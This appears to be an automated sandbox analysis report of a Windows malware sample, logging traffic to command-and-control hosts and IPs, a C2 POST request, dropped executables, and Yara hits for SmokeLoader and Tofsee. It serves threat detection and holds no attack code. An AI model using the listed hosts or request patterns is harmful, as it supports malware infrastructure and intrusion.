30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 4f 13 25 1e e9 e9 df b7 82 16 95 2d ec 0d 0a 30 0d 0a 0d 0a Data Ascii: 22I:82OO%-0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 59 8c 3a f8 0e 69 c0 31 c3 db 66 f1 64 50 06 b9 bc 8e 16 a3 1b 80 02 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OTeY:i1fdP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 94 4e 08 79 06 be aa 85 bc a1 5e b1 44 ca 7a a6 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 25I:82ONy^DzU0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 33 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 85 49 13 66 13 e9 a4 89 e3 fb 5f a9 1f da 6b a5 18 52 91 4a f7 e0 25 e5 7b 07 4d f2 fc c4 4a 0d 0a 30 0d 0a 0d 0a Data Ascii: 33I:82OIf_kRJ%{MJ0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:08:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjbkmt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49801 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.3:49848 version: TLS 1.2
Source: unknown HTTPS traffic detected: 67.199.248.14:443 -> 192.168.2.3:49849 version: TLS 1.2
Source: unknown HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.158.215:443 -> 192.168.2.3:49855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 164.132.207.80:443 -> 192.168.2.3:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 178.208.83.45:443 -> 192.168.2.3:49863 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 16.1.ewswwsi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.4f4deRCUD7.exe.7915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.ewswwsi.7915a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.4f4deRCUD7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ewswwsi.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.4f4deRCUD7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.329414547.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.381470872.0000000001FA1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.329530861.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.318145695.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.380500232.0000000000500000.00000004.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected Tofsee
Source: Yara match File source: 21.3.2961.exe.7b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.2961.exe.790e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000015.00000003.401725714.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.439382112.0000000000790000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.439136366.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2961.exe PID: 6620, type: MEMORYSTR

System Summary:

barindex
PE file has a writeable .text section
Source: A7CD.exe.11.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
Detected potential crypto function
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00402A5F 3_2_00402A5F
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00402AB3 3_2_00402AB3
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_00402A5F 3_1_00402A5F
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_1_00402AB3 3_1_00402AB3
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 15_2_00793253 15_2_00793253
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 15_2_007931FF 15_2_007931FF
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00402A5F 16_2_00402A5F
Source: C:\Users\user\AppData\Roaming\ewswwsi Code function: 16_2_00402AB3 16_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00410800 19_2_00410800
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00411280 19_2_00411280
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004103F0 19_2_004103F0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_004109F0 19_2_004109F0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_008714D0 19_2_008714D0
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00870640 19_2_00870640
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00870C40 19_2_00870C40
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: 19_2_00870A50 19_2_00870A50
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_0040C913 21_2_0040C913
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_00F09720 22_2_00F09720
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_00F00470 22_2_00F00470
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_00F00460 22_2_00F00460
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_0299A618 22_2_0299A618
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_029907B8 22_2_029907B8
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02991428 22_2_02991428
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02994538 22_2_02994538
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_0299BAA8 22_2_0299BAA8
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02992BA8 22_2_02992BA8
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02995938 22_2_02995938
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02998EA0 22_2_02998EA0
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_0299AF50 22_2_0299AF50
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02996598 22_2_02996598
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_02998F38 22_2_02998F38
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_04FD1410 22_2_04FD1410
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_04FD5188 22_2_04FD5188
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_04FD0040 22_2_04FD0040
Source: C:\Users\user\AppData\Local\Temp\3161.exe Code function: 22_2_04FD2A48 22_2_04FD2A48
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: 21_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError, 21_2_00401280
PE file contains strange resources
Source: 4f4deRCUD7.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 4f4deRCUD7.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8DDA.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8DDA.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9667.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9667.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A7CD.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D19D.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D19D.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D19D.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1E73.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1E73.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2961.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2961.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ewswwsi.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ewswwsi.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dkbkykdu.exe.21.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dkbkykdu.exe.21.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3161.exe Section loaded: mscorjit.dll Jump to behavior
PE file contains more sections than normal
Source: sqlite3[1].dll.19.dr Static PE information: Number of sections : 19 > 10
Source: sqlite3.dll.19.dr Static PE information: Number of sections : 19 > 10
Uses 32bit PE files
Source: 4f4deRCUD7.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Creates files inside the system directory
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\vlrzpavj\
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1E73.exe Code function: String function: 004048D0 appears 460 times
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: String function: 00792794 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: String function: 00402544 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\2961.exe Code function: String function: 0042B510 appears 31 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00401962 Sleep,NtTerminateProcess, 3_2_00401962
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_0040196D Sleep,NtTerminateProcess, 3_2_0040196D
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 3_2_00402000
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 3_2_0040250A
Source: C:\Users\user\Desktop\4f4deRCUD7.exe Code function: 3_2_00401A0B NtTerminateProcess, 3_2_00401A0B
